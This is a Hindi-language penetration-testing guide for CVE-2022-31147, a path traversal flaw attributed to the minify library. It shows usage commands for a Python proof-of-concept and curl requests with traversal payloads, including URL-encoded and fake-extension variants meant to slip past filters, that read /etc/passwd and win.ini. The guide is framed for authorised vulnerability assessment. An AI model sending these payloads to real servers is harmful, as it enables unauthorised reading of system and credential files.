
CVE-2022-31147, matthiasmullie/minify में एक पाथ ट्रैवर्सल दोष है। यह गाइड सुरक्षा टीमों को Linux और Windows पर Python और curl का उपयोग करके मनमानी फ़ाइल रीड (arbitrary file read) का परीक्षण करने में मदद करती है। इसमें स्वचालित पेलोड निर्माण, मैन्युअल सत्यापन और भेद्यता आकलन के लिए सुरक्षित प्रथाएँ शामिल हैं।
यह मार्गदर्शिका CVE-2022-31147 के परीक्षण के लिए व्यापक पद्धतियाँ प्रदान करती है, जो व्यापक रूप से उपयोग की जाने वाली matthiasmullie/minify लाइब्रेरी को प्रभावित करने वाली एक गंभीर पाथ ट्रैवर्सल भेद्यता है। यह भेद्यता हमलावरों को minify एंडपॉइंट में अपर्याप्त इनपुट सैनिटाइज़ेशन का फायदा उठाने की अनुमति देती है, जिससे Linux और Windows सर्वर दोनों पर मनमानी फ़ाइल पढ़ने की क्रियाएँ संभव हो सकती हैं। यह मार्गदर्शिका सुरक्षा पेशेवरों, पेनेट्रेशन परीक्षकों और शोधकर्ताओं के लिए तैयार की गई है जो इस खतरे के प्रति वेब अनुप्रयोगों के जोखिम का मूल्यांकन करना चाहते हैं।
मार्गदर्शिका का मूल एक स्वचालित Python प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है, जो व्यवस्थित रूप से ट्रैवर्सल पेलोड की एक विस्तृत श्रृंखला उत्पन्न और परीक्षण करती है। ये पेलोड सामान्य रूटिंग और फ़िल्टरिंग तंत्र को बायपास करने के लिए डायरेक्टरी ट्रैवर्सल (../) की विभिन्न गहराइयों, कई एन्कोडिंग योजनाओं (जैसे URL एन्कोडिंग और डबल एन्कोडिंग), और एंडपॉइंट विविधताओं (नकली एक्सटेंशन और क्वेरी पैरामीटर सहित) का उपयोग करते हैं। इन तकनीकों का लाभ उठाकर, स्क्रिप्ट कमजोर कॉन्फ़िगरेशन का पता लगाने की संभावना को अधिकतम करती है, यहाँ तक कि बुनियादी वेब एप्लिकेशन फ़ायरवॉल या कस्टम रूटिंग लॉजिक द्वारा सुरक्षित वातावरण में भी।
पता लगाने की सटीकता को ज्ञात फ़ाइल मार्करों के लिए प्रतिक्रिया सामग्री का विश्लेषण करने वाले अंतर्निहित ह्यूरिस्टिक्स के माध्यम से और बढ़ाया जाता है। Linux लक्ष्यों के लिए, स्क्रिप्ट /etc/passwd या अन्य संवेदनशील फ़ाइलों के विशिष्ट पैटर्न खोजती है, जबकि Windows सिस्टम के लिए, यह win.ini जैसी फ़ाइलों के भीतर संकेतकों को देखती है। यह दृष्टिकोण सुनिश्चित करता है कि सफल शोषण की विश्वसनीय रूप से पहचान की जाती है, झूठी सकारात्मकता को कम करता है और सत्यापन प्रक्रिया को सुव्यवस्थित करता है।
स्वचालित परीक्षण के अलावा, मार्गदर्शिका curl का उपयोग करके मैन्युअल सत्यापन तकनीकों की रूपरेखा प्रस्तुत करती है, जिससे व्यवसायी लक्षित विश्लेषण के लिए कस्टम अनुरोध तैयार और भेज सकते हैं या स्वतंत्र रूप से निष्कर्षों को सत्यापित कर सकते हैं। सुरक्षित और अधिकृत परीक्षण के लिए सिफारिशों पर पूरे समय जोर दिया गया है, जिसमें केवल उन्हीं प्रणालियों पर मूल्यांकन करने के महत्व को शामिल किया गया है जिनके लिए स्पष्ट अनुमति दी गई है।
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --linux --file /etc/passwd
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --windows --file C:\Windows\win.ini
सर्वर पर एक हानिरहित फ़ाइल बनाएं, फिर उसे पढ़ने का प्रयास करें:
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --file /var/www/test.txt
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd"
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../windows/win.ini"
curl -i "https://yourdomain.tld/cdn/minify/%2e%2e/../%2e%2e/../../etc/passwd"
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd.css"
https://yourdomain.tld/cdn/minify को अपने वास्तविक लक्ष्य URL से बदलें।